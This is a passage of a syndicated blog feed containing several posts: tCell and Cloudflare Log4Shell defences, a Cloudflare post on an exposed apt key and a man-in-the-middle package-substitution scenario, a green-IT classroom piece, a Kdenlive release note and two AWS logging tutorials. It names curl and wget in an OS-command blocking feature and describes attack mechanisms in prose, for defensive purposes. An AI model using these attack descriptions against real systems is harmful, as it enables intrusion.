We’ve heard from customers that they’re unsure of whether or not their applications are leveraging the vulnerable package. With tCell, we will alert you if any vulnerable packages (such as CVE 2021-44228 and CVE 2021-45046) are loaded by the application at runtime. The best way to eliminate the risk exposure for Log4Shell is to upgrade any vulnerable packages to 2.16. Check out the video below for more information.



How to Protect Your Applications Against Log4Shell With tCell

If you would like to provide additional checks outside of the vulnerable packages check at runtime, please refer to our blog on how InsightVM can help you do this.

4. Enable OS commands

One of the benefits of using tCell’s app server agents is the fact that you can enable blocking for OS commands. This will prevent a wide range of exploits leveraging things like curl, wget, etc. Below you’ll find a picture of how to enable OS commands (either report only or block and report).

How to Protect Your Applications Against Log4Shell With tCell

5. Detect and block suspicious actors

All events that are detected by the App Firewall in tCell are fed into the analytics engine to determine Suspicious Actors. The Suspicious Actors feature takes in multiple inputs (such as failed logins, injections, unusual inputs, etc.) and correlates these to an IP address.

How to Protect Your Applications Against Log4Shell With tCell

Not only can you monitor for suspicious actors with tCell, but you can also configure tCell to block all activity or just the suspicious activity from the malicious actor’s IP.

How to Protect Your Applications Against Log4Shell With tCell

All the components together make the magic happen

The power of tCell isn’t in one or two features, but rather its robust capability set, which we believe is required to secure any environment with a defense-in-depth approach. We will help customers not only identify vulnerable Log4j packages that are being used, but also assist with monitoring for suspicious activity and block attacks. The best security is when you have multiple types of defenses available to protect against bad actors, and this is why using the capabilities mentioned here will prove to be valuable in protecting against Log4Shell and future threats.

Get more critical insights about defending against Log4Shell

Check out our resource center

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Post Syndicated from Gabriel Gabor original https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Hot on the heels of CVE-2021-44228 a second Log4J CVE has been filed CVE-2021-45046. The rules that we previously released for CVE-2021-44228 give the same level of protection for this new CVE.

This vulnerability is actively being exploited and anyone using Log4J should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0. The latest version can be found on the Log4J download page.

Customers using the Cloudflare WAF have three rules to help mitigate any exploit attempts:

Rule ID Description Default Action
100514 (legacy WAF)
6b1cc72dff9746469d4695a474430f12 (new WAF)
Log4J Headers BLOCK
100515 (legacy WAF)
0c054d4e4dd5455c9ff8f01efe5abb10 (new WAF)
Log4J Body BLOCK
100516 (legacy WAF)
5f6744fa026a4638bda5b3d7d5e015dd (new WAF)
Log4J URL BLOCK

The mitigation has been split across three rules inspecting HTTP headers, body and URL respectively.

In addition to the above rules we have also released a fourth rule that will protect against a much wider range of attacks at the cost of a higher false positive rate. For that reason we have made it available but not set it to BLOCK by default:

Rule ID Description Default Action
100517 (legacy WAF)
2c5413e155db4365befe0df160ba67d7 (new WAF)
Log4J Advanced URI, Headers DISABLED

Who is affected

Log4J is a powerful Java-based logging library maintained by the Apache Software Foundation.

In all Log4J versions >= 2.0-beta9 and <= 2.14.1 JNDI features used in configuration, log messages, and parameters can be exploited by an attacker to perform remote code execution. Specifically, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

In addition, the previous mitigations for CVE-2021-22448 as seen in version 2.15.0 were not adequate to protect against CVE-2021-45046.

An exposed apt signing key and how to improve apt security

Post Syndicated from Jeff Hiner original https://blog.cloudflare.com/dont-use-apt-key/

An exposed apt signing key and how to improve apt security

An exposed apt signing key and how to improve apt security

Recently, we received a bug bounty report regarding the GPG signing key used for pkg.cloudflareclient.com, the Linux package repository for our Cloudflare WARP products. The report stated that this private key had been exposed. We’ve since rotated this key and we are taking steps to ensure a similar problem can’t happen again. Before you read on, if you are a Linux user of Cloudflare WARP, please follow these instructions to rotate the Cloudflare GPG Public Key trusted by your package manager. This only affects WARP users who have installed WARP on Linux. It does not affect Cloudflare customers of any of our other products or WARP users on mobile devices.

But we also realized that the impact of an improperly secured private key can have consequences that extend beyond the scope of one third-party repository. The remainder of this blog shows how to improve the security of apt with third-party repositories.

The unexpected impact

At first, we thought that the exposed signing key could only be used by an attacker to forge packages distributed through our package repository. However, when reviewing impact for Debian and Ubuntu platforms we found that our instructions were outdated and insecure. In fact, we found the majority of Debian package repositories on the Internet were providing the same poor guidance: download the GPG key from a website and then either pipe it directly into apt-key or copy it into /etc/apt/trusted.gpg.d/. This method adds the key as a trusted root for software installation from any source. To see why this is a problem, we have to understand how apt downloads and verifies software packages.

How apt verifies packages

In the early days of Linux, package maintainers wanted to make sure users could trust that the software being installed on their machines came from a trusted source.

Apt has a list of places to pull packages from (sources) and a method to validate those sources (trusted public keys). Historically, the keys were stored in a single keyring file: /etc/apt/trusted.gpg. Later, as third party repositories became more common, apt could also look inside /etc/apt/trusted.gpg.d/ for individual key files.

What happens when you run apt update? First, apt fetches a signed file called InRelease from each source. Some servers supply separate Release and signature files instead, but they serve the same purpose. InRelease is a file containing metadata that can be used to cryptographically validate every package in the repository. Critically, it is also signed by the repository owner’s private key. As part of the update process, apt verifies that the InRelease file has a valid signature, and that the signature was generated by a trusted root. If everything checks out, a local package cache is updated with the repository’s contents. This cache is directly used when installing packages. The chain of signed InRelease files and cryptographic hashes ensures that each downloaded package hasn’t been corrupted or tampered with along the way.

An exposed apt signing key and how to improve apt security

A typical third-party repository today

For most Ubuntu/Debian users today, this is what adding a third-party repository looks like in practice:

  1. Add a file in /etc/apt/sources.list.d/ telling apt where to look for packages.
  2. Add the gpg public key to /etc/apt/trusted.gpg.d/, probably via apt-key.

If apt-key is used in the second step, the command typically pops up a deprecation warning, telling you not to use apt-key. There’s a good reason: adding a key like this trusts it for any repository, not just the source from step one. This means if the private key associated with this new source is compromised, attackers can use it to bypass apt’s signature verification and install their own packages.

What would this type of attack look like? Assume you’ve got a stock Debian setup with a default sources list1:

deb http://deb.debian.org/debian/ bullseye main non-free contrib
deb http://security.debian.org/debian-security bullseye-security main contrib non-free

At some point you installed a trusted key that was later exposed, and the attacker has the private key. This key was added alongside a source pointing at https, assuming that even if the key is broken an attacker would have to break TLS encryption as well to install software via that route.

You’re enjoying a hot drink at your local cafe, where someone nefarious has managed to hack the router without your knowledge. They’re able to intercept http traffic and modify it without your knowledge. An auto-update script on your laptop runs apt update. The attacker pretends to be deb.debian.org, and because at least one source is configured to use http, the attacker doesn’t need to break https. They return a modified InRelease file signed with the compromised key, indicating that a newer update of the bash package is available. apt pulls the new package (again from the attacker) and installs it, as root. Now you’ve got a big problem2.

A better way

It seems the way most folks are told to set up third-party Debian repositories is wrong. What if you could tell apt to only trust that GPG key for a specific source? That, combined with the use of https, would significantly reduce the impact of a key compromise. As it turns out, there’s a way to do that! You’ll need to do two things:

  1. Make sure the key isn’t in /etc/apt/trusted.gpg or /etc/apt/trusted.gpg.d/ anymore. If the key is its own file, the easiest way to do this is to move it to /usr/share/keyrings/. Make sure the file is owned by root, and only root can write to it. This step is important, because it prevents apt from using this key to check all repositories in the sources list.
  2. Modify the sources file in /etc/apt/sources.list.d/ telling apt that this particular repository can be “signed by” a specific key. When you’re done, the line should look like this:

deb [signed-by=/usr/share/keyrings/cloudflare-client.gpg] https://pkg.cloudflareclient.com/ bullseye main

Some source lists contain other metadata indicating that the source is only valid for certain architectures. If that’s the case, just add a space in the middle, like so:

deb [amd64 signed-by=/usr/share/keyrings/cloudflare-client.gpg] https://pkg.cloudflareclient.com/ bullseye main

We’ve updated the instructions on our own repositories for the WARP Client and Cloudflare with this information, and we hope others will follow suit.

If you run apt-key list on your own machine, you’ll probably find several keys that are trusted far more than they should be. Now you know how to fix them!

For those running your own repository, now is a great time to review your installation instructions. If your instructions tell users to curl a public key file and pipe it straight into sudo apt-key, maybe there’s a safer way. While you’re in there, ensuring the package repository supports https is a great way to add an extra layer of security (and if you host your traffic via Cloudflare, it’s easy to set up, and free. You can follow this blog post to learn how to properly configure Cloudflare to cache Debian packages).


1RPM-based distros like Fedora, CentOS, and RHEL also use a common trusted GPG store to validate packages, but since they generally use https by default to fetch updates they aren’t vulnerable to this particular attack.
2The attack described above requires an active on-path network attacker. If you are using the WARP client or Cloudflare for Teams to tunnel your traffic to Cloudflare, your network traffic cannot be tampered with on local networks.

Green information technology and classroom discussions

Post Syndicated from Gemma Coleman original https://www.raspberrypi.org/blog/green-information-technology-climate-change-data-centre-e-waste-hello-world/

The global IT industry generates as much CO2 as the aviation industry. In Hello World issue 17, we learn about the hidden impact of our IT use and the changes we can make from Beverly Clarke, national community manager for Computing at School and author of Computer Science Teacher: Insight Into the Computing Classroom.

With the onset of the pandemic, the world seemed to shut down. Flights were grounded, fewer people were commuting, and companies and individuals increased their use of technology for work and communication. On the surface, this seemed like a positive time for the environment. However, I soon found myself wondering about the impact that this increased use of technology would have on our planet, in particular the increases in energy consumption and e-waste. This is a major social, moral, and ethical issue that is hiding in plain sight — green IT is big news.

This is a major social, moral, and ethical issue that is hiding in plain sight — green IT is big news.

Energy and data centres

Thinking that online is always better for the planet is not always as straightforward as it seems. If we choose to meet via conference call rather than travelling to a meeting, there are hidden environmental impacts to consider. If there are 50 people on a call from across the globe, all of the data generated is being routed around the world through data centres, and a lot of energy is being used. If all of those people are also using video, that is even more energy than audio only.

Stacks of server hardware behind metal fencing in a data centre.
Data centres consume a lot of energy — and how is that energy generated?

Not only is the amount of energy being used a concern, but we must also ask ourselves how these data centres are being powered. Is the energy they are using coming from a renewable source? If not, we may be replacing one environmental problem with another.

What about other areas of our lives, such as taking photos or filming videos? These two activities have probably increased as we have been separated from family and friends. They use energy, especially when the image or video is then shared with others around the world and consequently routed through data centres. A large amount of energy is being used, and more is used the further the image travels.

Not only is the amount of energy being used a concern, but we must also ask ourselves how these data centres are being powered.

Similarly, consider social media and the number of posts individuals and companies make on a daily basis. All of these are travelling through data centres and using energy, yet for the most part this is not visible to the user.

E-waste

E-waste is another green IT issue, and one that will only get worse as we rely on electronic devices more. As well as the potential eyesore of mountains of e-waste, there is also the impact upon the planet of mining the precious metals used in these electronics, such as gold, copper, aluminium, and steel.

A hand holding two smartphones.
In their marketing, device manufacturers and mobile network carriers make us see the phones we currently own in a negative light so that we feel the need to upgrade to the newest model.

The processes used to mine these metals lead to pollution, and we should also consider that some of the precious metals used in our devices could run out, as there is not an endless supply in the Earth’s surface.

It is also problematic that a lot of e-waste is sent to developing countries with limited recycling plants […].

It is also problematic that a lot of e-waste is sent to developing countries with limited recycling plants, and so much of the e-waste ends up in landfill. This can lead to toxic substances being leaked into the Earth’s surface.

First steps towards action

With my reflective hat on, I started to think about discussions we as teachers could have with pupils around this topic, and came up with the following:

  • Help learners to talk about the cloud and where it is located. We can remind them that the cloud is a physical entity. Show them images of data centres to help make this real, and allow them to appreciate where the data we generate every day goes.
  • Ask learners how many photos and videos they have on their devices, and where they think those items are stored. This can be extended to a year group or whole-school exercise so they can really appreciate the sheer amount of data being used and sent across the cloud, and how data centres fit with that energy consumption. I did this activity and found that I had 7163 photos and 304 videos on my phone — that’s using a lot of energy!
A classroom of students in North America.
Helping young people gain an understanding of the impact of our use of electronic devices is an important action you can take.
  • Ask learners to research any local data centres and find out how many data centres there are in the world. You could then develop this into a discussion, including language related to data centres such as sensors, storage devices, cabling, and infrastructure. This helps learners to connect the theory to real-world examples.
  • Ask learners to reflect upon how many devices they use that are connected to the Internet of Things.
  • Consider for ourselves and ask parents, family, and friends how our online usage has changed since before the pandemic.
  • Consider what happens to electronic devices when they are thrown away and become e-waste. Where does it all go? What is the effect of e-waste on communities and countries?

Tips for greener IT

UK-based educators can watch a recent episode of TV programme Dispatches that investigates the carbon footprint of the IT industry. You can add the following tips from the programme to your discussions:

  • Turn off electronic devices when not in use
  • Use audio only when on online calls
  • Dispose of your old devices responsibly
  • Look at company websites and see what their commitment is to green IT, and consider whether we should support companies whose commitment to the planet is poor
  • Use WiFi instead of 3G/4G/5G, as it uses less energy

These lists are not exhaustive, but provide a good starting point for discussions with learners. We should all play our small part in ensuring that we #RestoreOurEarth — this year’s Earth Day theme — and having an awareness and understanding of the impact of our use of electronic devices is part of the way forward.

Some resources on green IT — do you have others?

What about you? In the comments below, share your thoughts, tips, and resources on green IT and how we can bring awareness of it to our learners and young people at home.

The post Green information technology and classroom discussions appeared first on Raspberry Pi.

Kdenlive 21.12 released

Post Syndicated from original https://lwn.net/Articles/878696/rss

Version
21.12
of the Kdenlive video editor is out.

The last and most exciting release of Kdenlive this year is out and
brings long awaited features like Multicam Editing and Slip
trimming mode, all of which drastically improve your editing
workflow. This version also comes with a new deep-learning based
tracking algorithm, an auto-magical noise reduction filter and
support for multiple Project Bins.

Unify log aggregation and analytics across compute platforms

Post Syndicated from Hari Ohm Prasath original https://aws.amazon.com/blogs/big-data/unify-log-aggregation-and-analytics-across-compute-platforms/

Our customers want to make sure their users have the best experience running their application on AWS. To make this happen, you need to monitor and fix software problems as quickly as possible. Doing this gets challenging with the growing volume of data needing to be quickly detected, analyzed, and stored. In this post, we walk you through an automated process to aggregate and monitor logging-application data in near-real time, so you can remediate application issues faster.

This post shows how to unify and centralize logs across different computing platforms. With this solution, you can unify logs from Amazon Elastic Compute Cloud (Amazon EC2), Amazon Elastic Container Service (Amazon ECS), Amazon Elastic Kubernetes Service (Amazon EKS), Amazon Kinesis Data Firehose, and AWS Lambda using agents, log routers, and extensions. We use Amazon OpenSearch Service (successor to Amazon Elasticsearch Service) with OpenSearch Dashboards to visualize and analyze the logs, collected across different computing platforms to get application insights. You can deploy the solution using the AWS Cloud Development Kit (AWS CDK) scripts provided as part of the solution.

Customer benefits

A unified aggregated log system provides the following benefits:

  • A single point of access to all the logs across different computing platforms
  • Help defining and standardizing the transformations of logs before they get delivered to downstream systems like Amazon Simple Storage Service (Amazon S3), Amazon OpenSearch Service, Amazon Redshift, and other services
  • The ability to use Amazon OpenSearch Service to quickly index, and OpenSearch Dashboards to search and visualize logs from its routers, applications, and other devices

Solution overview

In this post, we use the following services to demonstrate log aggregation across different compute platforms:

  • Amazon EC2 – A web service that provides secure, resizable compute capacity in the cloud. It’s designed to make web-scale cloud computing easier for developers.
  • Amazon ECS – A web service that makes it easy to run, scale, and manage Docker containers on AWS, designed to make the Docker experience easier for developers.
  • Amazon EKS – A web service that makes it easy to run, scale, and manage Docker containers on AWS.
  • Kinesis Data Firehose – A fully managed service that makes it easy to stream data to Amazon S3, Amazon Redshift, or Amazon OpenSearch Service.
  • Lambda – A compute service that lets you run code without provisioning or managing servers. It’s designed to make web-scale cloud computing easier for developers.
  • Amazon OpenSearch Service – A fully managed service that makes it easy for you to perform interactive log analytics, real-time application monitoring, website search, and more.

The following diagram shows the architecture of our solution.

The architecture uses various log aggregation tools such as log agents, log routers, and Lambda extensions to collect logs from multiple compute platforms and deliver them to Kinesis Data Firehose. Kinesis Data Firehose streams the logs to Amazon OpenSearch Service. Log records that fail to get persisted in Amazon OpenSearch service will get written to AWS S3. To scale this architecture, each of these compute platforms streams the logs to a different Firehose delivery stream, added as a separate index, and rotated every 24 hours.

The following sections demonstrate how the solution is implemented on each of these computing platforms.

Amazon EC2

The Kinesis agent collects and streams logs from the applications running on EC2 instances to Kinesis Data Firehose. The agent is a standalone Java software application that offers an easy way to collect and send data to Kinesis Data Firehose. The agent continuously monitors files and sends logs to the Firehose delivery stream.

BDB-1742-Ec2

The AWS CDK script provided as part of this solution deploys a simple PHP application that generates logs under the /etc/httpd/logs directory on the EC2 instance. The Kinesis agent is configured via /etc/aws-kinesis/agent.json to collect data from access_logs and error_logs, and stream them periodically to Kinesis Data Firehose (ec2-logs-delivery-stream).

Because Amazon OpenSearch Service expects data in JSON format, you can add a call to a Lambda function to transform the log data to JSON format within Kinesis Data Firehose before streaming to Amazon OpenSearch Service. The following is a sample input for the data transformer:

46.99.153.40 - - [29/Jul/2021:15:32:33 +0000] "GET / HTTP/1.1" 200 173 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

The following is our output:

{
    "logs" : "46.99.153.40 - - [29/Jul/2021:15:32:33 +0000] \"GET / HTTP/1.1\" 200 173 \"-\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\"",
}

We can enhance the Lambda function to extract the timestamp, HTTP, and browser information from the log data, and store them as separate attributes in the JSON document.

Amazon ECS

In the case of Amazon ECS, we use FireLens to send logs directly to Kinesis Data Firehose. FireLens is a container log router for Amazon ECS and AWS Fargate that gives you the extensibility to use the breadth of services at AWS or partner solutions for log analytics and storage.

BDB-1742-ECS

The architecture hosts FireLens as a sidecar, which collects logs from the main container running an httpd application and sends them to Kinesis Data Firehose and streams to Amazon OpenSearch Service. The AWS CDK script provided as part of this solution deploys a httpd container hosted behind an Application Load Balancer. The httpd logs are pushed to Kinesis Data Firehose (ecs-logs-delivery-stream) through the FireLens log router.

Amazon EKS

With the recent announcement of Fluent Bit support for Amazon EKS, you no longer need to run a sidecar to route container logs from Amazon EKS pods running on Fargate. With the new built-in logging support, you can select a destination of your choice to send the records to. Amazon EKS on Fargate uses a version of Fluent Bit for AWS, an upstream conformant distribution of Fluent Bit managed by AWS.

BDB-1742-EKS

The AWS CDK script provided as part of this solution deploys an NGINX container hosted behind an internal Application Load Balancer. The NGINX container logs are pushed to Kinesis Data Firehose (eks-logs-delivery-stream) through the Fluent Bit plugin.

Lambda

For Lambda functions, you can send logs directly to Kinesis Data Firehose using the Lambda extension. You can deny the records being written to Amazon CloudWatch.

BDB-1742-Lambda

After deployment, the workflow is as follows:

  1. On startup, the extension subscribes to receive logs for the platform and function events. A local HTTP server is started inside the external extension, which receives the logs.
  2. The extension buffers the log events in a synchronized queue and writes them to Kinesis Data Firehose via PUT records.
  3. The logs are sent to downstream systems.
  4. The logs are sent to Amazon OpenSearch Service.

The Firehose delivery stream name gets specified as an environment variable (AWS_KINESIS_STREAM_NAME).

For this solution, because we’re only focusing on collecting the run logs of the Lambda function, the data transformer of the Kinesis Data Firehose delivery stream filters out the records of type function ("type":"function") before sending it to Amazon OpenSearch Service.

The following is a sample input for the data transformer:

[
   {
      "time":"2021-07-29T19:54:08.949Z",
      "type":"platform.start",
      "record":{
         "requestId":"024ae572-72c7-44e0-90f5-3f002a1df3f2",
         "version":"$LATEST"
      }
   },
   {
      "time":"2021-07-29T19:54:09.094Z",
      "type":"platform.logsSubscription",
      "record":{
         "name":"kinesisfirehose-logs-extension-demo",
         "state":"Subscribed",
         "types":[
            "platform",
            "function"
         ]
      }
   },
   {
      "time":"2021-07-29T19:54:09.096Z",
      "type":"function",
      "record":"2021-07-29T19:54:09.094Z\tundefined\tINFO\tLoading function\n"
   },
   {
      "time":"2021-07-29T19:54:09.096Z",
      "type":"platform.extension",
      "record":{
         "name":"kinesisfirehose-logs-extension-demo",
         "state":"Ready",
         "events":[
            "INVOKE",
            "SHUTDOWN"
         ]
      }
   },
   {
      "time":"2021-07-29T19:54:09.097Z",
      "type":"function",
      "record":"2021-07-29T19:54:09.097Z\t024ae572-72c7-44e0-90f5-3f002a1df3f2\tINFO\tvalue1 = value1\n"
   },   
   {
      "time":"2021-07-29T19:54:09.098Z",
      "type":"platform.runtimeDone",
      "record":{
         "requestId":"024ae572-72c7-44e0-90f5-3f002a1df3f2",
         "status":"success"
      }
   }
]

Prerequisites

To implement this solution, you need the following prerequisites:

Build the code

Check out the AWS CDK code by running the following command:

mkdir unified-logs && cd unified-logs
git clone https://github.com/aws-samples/unified-log-aggregation-and-analytics .

Build the lambda extension by running the following command:

cd lib/computes/lambda/extensions
chmod +x extension.sh
./extension.sh
cd ../../../../

Make sure to replace default AWS region specified under the value of firehose.endpoint attribute inside lib/computes/ec2/ec2-startup.sh.

Build the code by running the following command:

yarn install && npm run build

Deploy the code

If you’re running AWS CDK for the first time, run the following command to bootstrap the AWS CDK environment (provide your AWS account ID and AWS Region):

cdk bootstrap \
    --cloudformation-execution-policies arn:aws:iam::aws:policy/AdministratorAccess \
    aws://<AWS Account Id>/<AWS_REGION>

You only need to bootstrap the AWS CDK one time (skip this step if you have already done this).

Run the following command to deploy the code:

cdk deploy --requires-approval

You get the following output:

 ✅  CdkUnifiedLogStack

Outputs:
CdkUnifiedLogStack.ec2ipaddress = xx.xx.xx.xx
CdkUnifiedLogStack.ecsloadbalancerurl = CdkUn-ecsse-PY4D8DVQLK5H-xxxxx.us-east-1.elb.amazonaws.com
CdkUnifiedLogStack.ecsserviceLoadBalancerDNS570CB744 = CdkUn-ecsse-PY4D8DVQLK5H-xxxx.us-east-1.elb.amazonaws.com
CdkUnifiedLogStack.ecsserviceServiceURL88A7B1EE = http://CdkUn-ecsse-PY4D8DVQLK5H-xxxx.us-east-1.elb.amazonaws.com
CdkUnifiedLogStack.eksclusterClusterNameCE21A0DB = ekscluster92983EFB-d29892f99efc4419bc08534a3d253160
CdkUnifiedLogStack.eksclusterConfigCommand515C0544 = aws eks update-kubeconfig --name ekscluster92983EFB-d29892f99efc4419bc08534a3d253160 --region us-east-1 --role-arn arn:aws:iam::xxx:role/CdkUnifiedLogStack-clustermasterroleCD184EDB-12U2TZHS28DW4
CdkUnifiedLogStack.eksclusterGetTokenCommand3C33A2A5 = aws eks get-token --cluster-name ekscluster92983EFB-d29892f99efc4419bc08534a3d253160 --region us-east-1 --role-arn arn:aws:iam::xxx:role/CdkUnifiedLogStack-clustermasterroleCD184EDB-12U2TZHS28DW4
CdkUnifiedLogStack.elasticdomainarn = arn:aws:es:us-east-1:xxx:domain/cdkunif-elasti-rkiuv6bc52rp
CdkUnifiedLogStack.s3bucketname = cdkunifiedlogstack-logsfailederrcapturebucket0bcc-xxxxx
CdkUnifiedLogStack.samplelambdafunction = CdkUnifiedLogStack-LambdatransformerfunctionFA3659-c8u392491FrW

Stack ARN:
arn:aws:cloudformation:us-east-1:xxxx:stack/CdkUnifiedLogStack/6d53ef40-efd2-11eb-9a9d-1230a5204572

AWS CDK takes care of building the required infrastructure, deploying the sample application, and collecting logs from different sources to Amazon OpenSearch Service.

The following is some of the key information about the stack:

  • ec2ipaddress – The public IP address of the EC2 instance, deployed with the sample PHP application
  • ecsloadbalancerurl – The URL of the Amazon ECS Load Balancer, deployed with the httpd application
  • eksclusterClusterNameCE21A0DB – The Amazon EKS cluster name, deployed with the NGINX application
  • samplelambdafunction – The sample Lambda function using the Lambda extension to send logs to Kinesis Data Firehose
  • opensearch-domain-arn – The ARN of the Amazon OpenSearch Service domain

Generate logs

To visualize the logs, you first need to generate some sample logs.

  1. To generate Lambda logs, invoke the function using the following AWS CLI command (run it a few times):
aws lambda invoke \
--function-name "<<samplelambdafunction>>" \
--payload '{"payload": "hello"}' /tmp/invoke-result \
--cli-binary-format raw-in-base64-out \
--log-type Tail

Make sure to replace samplelambdafunction with the actual Lambda function name. The file path needs to be updated based on the underlying operating system.

The function should return "StatusCode": 200, with the following output:

{
    "StatusCode": 200,
    "LogResult": "<<Encoded>>",
    "ExecutedVersion": "$LATEST"
}
  1. Run the following command a couple of times to generate Amazon EC2 logs:
curl http://ec2ipaddress:80

Make sure to replace ec2ipaddress with the public IP address of the EC2 instance.

  1. Run the following command a couple of times to generate Amazon ECS logs:
curl http://ecsloadbalancerurl:80

Make sure to replace ecsloadbalancerurl with the public ARN of the AWS Application Load Balancer.

We deployed the NGINX application with an internal load balancer, so the load balancer hits the health checkpoint of the application, which is sufficient to generate the Amazon EKS access logs.

Visualize the logs

To visualize the logs, complete the following steps:

  1. On the Amazon OpenSearch Service console, choose the hyperlink provided for the OpenSearch Dashboard 7URL.
  2. Configure access to the OpenSearch Dashboard.
  3. Under OpenSearch Dashboard, on the Discover menu, start creating a new index pattern for each compute log.

We can see separate indexes for each compute log partitioned by date, as in the following screenshot.

BDB-1742-create-index

The following screenshot shows the process to create index patterns for Amazon EC2 logs.

BDB-1742-ec2

After you create the index pattern, we can start analyzing the logs using the Discover menu under OpenSearch Dashboard in the navigation pane. This tool provides a single searchable and unified interface for all the records with various compute platforms. We can switch between different logs using the Change index pattern submenu.

BDB-1742-unified

Clean up

Run the following command from the root directory to delete the stack:

cdk destroy

Conclusion

In this post, we showed how to unify and centralize logs across different compute platforms using Kinesis Data Firehose and Amazon OpenSearch Service. This approach allows you to analyze logs quickly and the root cause of failures, using a single platform rather than different platforms for different services.

If you have feedback about this post, submit your comments in the comments section.

Resources

For more information, see the following resources:


About the author

HariHari Ohm Prasath is a Senior Modernization Architect at AWS, helping customers with their modernization journey to become cloud native. Hari loves to code and actively contributes to the open source initiatives. You can find him in Medium, Github & Twitter @hariohmprasath.

balluBallu Singh is a Principal Solutions Architect at AWS. He lives in the San Francisco Bay area and helps customers architect and optimize applications on AWS. In his spare time, he enjoys reading and spending time with his family.

Set advanced settings with the Amazon OpenSearch Service Dashboards API

Post Syndicated from Prashant Agrawal original https://aws.amazon.com/blogs/big-data/set-advanced-settings-with-the-amazon-opensearch-service-dashboards-api/

Amazon OpenSearch Service (successor to Amazon Elasticsearch Service) is a fully managed service that you can use to deploy and operate OpenSearch clusters cost-effectively at scale in the AWS Cloud. The service makes it easy for you to perform interactive log analytics, real-time application monitoring, website search, and more by offering the latest versions of OpenSearch, support for 19 versions of Elasticsearch (1.5 to 7.10 versions), and visualization capabilities powered by OpenSearch Dashboards and Kibana (1.5 to 7.10 versions).

A common use case of OpenSearch in multi-tenant environments is to use tenants in OpenSearch Dashboards and provide segregated index patterns, dashboards, and visualizations to different teams in the organization. Tenants in OpenSearch Dashboards aren’t the same as indexes, where OpenSearch organizes all data. You may still have multiple indexes for multi-tenancy and tenants for controlling access to OpenSearch Dashboards’ saved objects.

In this post, we focus on operationalizing advanced settings for OpenSearch Dashboards tenants with programmatic ways, in particular with the Dashboards Advanced Settings API. For a deeper insight into multi-tenancy in OpenSearch, refer to OpenSearch Dashboards multi-tenancy.

One example of advanced settings configurations is deploying time zone settings in an environment where each tenant is aligned to a different geographic area with specific time zone. We explain the time zone configuration with the UI and demonstrate configuring it with the OpenSearch Dashboards Advanced Settings API using curl. This post also provides guidance for other advanced settings you may wish to include in your deployment.

To follow along in this post, make sure you have an Amazon OpenSearch Service domain with access to OpenSearch Dashboards through a role with administrator privileges for the domain. For more information about enabling access control mechanisms for your domains, see Fine-grained access control in Amazon OpenSearch Service.

The following examples use Amazon OpenSearch Service version 1.0, which was the latest release at the time of writing.

Configure advanced settings in the OpenSearch Dashboards UI

To configure advanced settings via the OpenSearch Dashboards UI, complete the following steps:

  1. Log in to OpenSearch Dashboards.
  2. Choose your user icon and choose Switch Tenants to choose the tenant you want to change configuration for.

By default, all OpenSearch Dashboards users have access to two tenants: private and global. The global tenant is shared between every OpenSearch Dashboards user. The private tenant is exclusive to each user and used mostly for experimenting before publishing configuration to other tenants. Make sure to check your configurations in the private tenant before replicating in other tenants, including global.

  1. Choose Stack Management in the navigation pane, then choose Advanced Settings.
  2. In your desired tenant context, choose a value for Timezone for date formatting.

In this example, we change the time zone from the default selection Browser to US/Eastern.

  1. Choose Save changes.

Configure advanced settings with the OpenSearch Dashboards API

For environments where you prefer to perform operations programmatically, Amazon OpenSearch Service provides the ability to configure advanced settings with the OpenSearch Dashboards advanced settings API.

Let’s walk through configuring the time zone using curl.

  1. First, you need to authenticate to the API endpoint with your user name and password, and retrieve the authorization cookies into the file auth.txt:
curl -X POST  https://<domain_endpoint>/_dashboards/auth/login \
-H "osd-xsrf: true" \
-H "content-type:application/json" \
-d '{"username":"<username>", "password":"<password>"}' \
-c auth.txt

In this example, we configure OpenSearch Dashboards to use the internal user database, and the user inherits administrative permissions under the global tenant. In multi-tenant environments, the user is required to have relevant tenant permissions. You can see an example of this in the next section, where we illustrate a multi-tenant environment. Access control in OpenSearch Dashboards is a broad and important topic, and it would be unfair to try to squeeze all of it in this post. Therefore, we don’t cover access control in depth here. For additional information on access control in multi-tenant OpenSearch Dashboards, refer to OpenSearch Dashboards multi-tenancy.

The auth.txt file holds authorization cookies that you use to pass configuration changes to the API endpoint. The auth.txt file should look similar to the following code:

# Netscape HTTP Cookie File
# https://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

#HttpOnly_<domain_endpoint> FALSE   /_dashboards    TRUE    0       security_authentication Fe26.2**80fca234dd0974fb6dfe9427e6b8362ba1dd78fc5a71
e7f9803694f40980012b*k9QboTT5A24hs71_wN32Cw*9-RvY2UhS-Cmat4RZPHohTbczyGRjmHezlIlhwePG1gv_P2bgSuZhx9XBV9I-zzdxrZIbJTTpymy4mv1rAB_GRuXjt-6ITUfsG58GrI7TI7D3pWKaw8n6lrhamccGYqL9K_dQrE4kr_godwEDLydR1d_
Oc11jEG98yi_O0qhBTu1kDNzNAEqgXEoaLS--afnbwPS0zvqUc4MUgrfGQOTt7mUoWMC778Tpii4V4gxhAcRqe_KoYQG1LhUq-j9XTHCouzB4qTJ8gR3tlbVYMFwhA**f278b1c9f2c9e4f50924c47bfd1a992234400c6f11ee6f005beecc4201760998*3Aj8gQAIKKPoUR0PX-5doFgZ9zqxlcB3YbfDgJIBNLU
  1. Construct configuration changes within the curl body and submit them using an authorization cookie. In this example, we included a sample to modify the time zone to US/Eastern.
curl -X PUT https://<domain_endpoint>/_dashboards/api/saved_objects/config/1.0.0-SNAPSHOT \
-H "osd-xsrf:true" \
-H "content-type:application/json" \
-d '{"attributes":{"dateFormat:tz":"US/Eastern"}}' \
-b auth.txt

By default, the constructed API modifies the configuration in the private tenant, which is exclusive to each user, can’t be shared, and is ideal for testing. We provide instructions to modify configuration in multi-tenant environments later in the post.

Your API call should receive a response similar to the following code, indicating the changes you submitted:

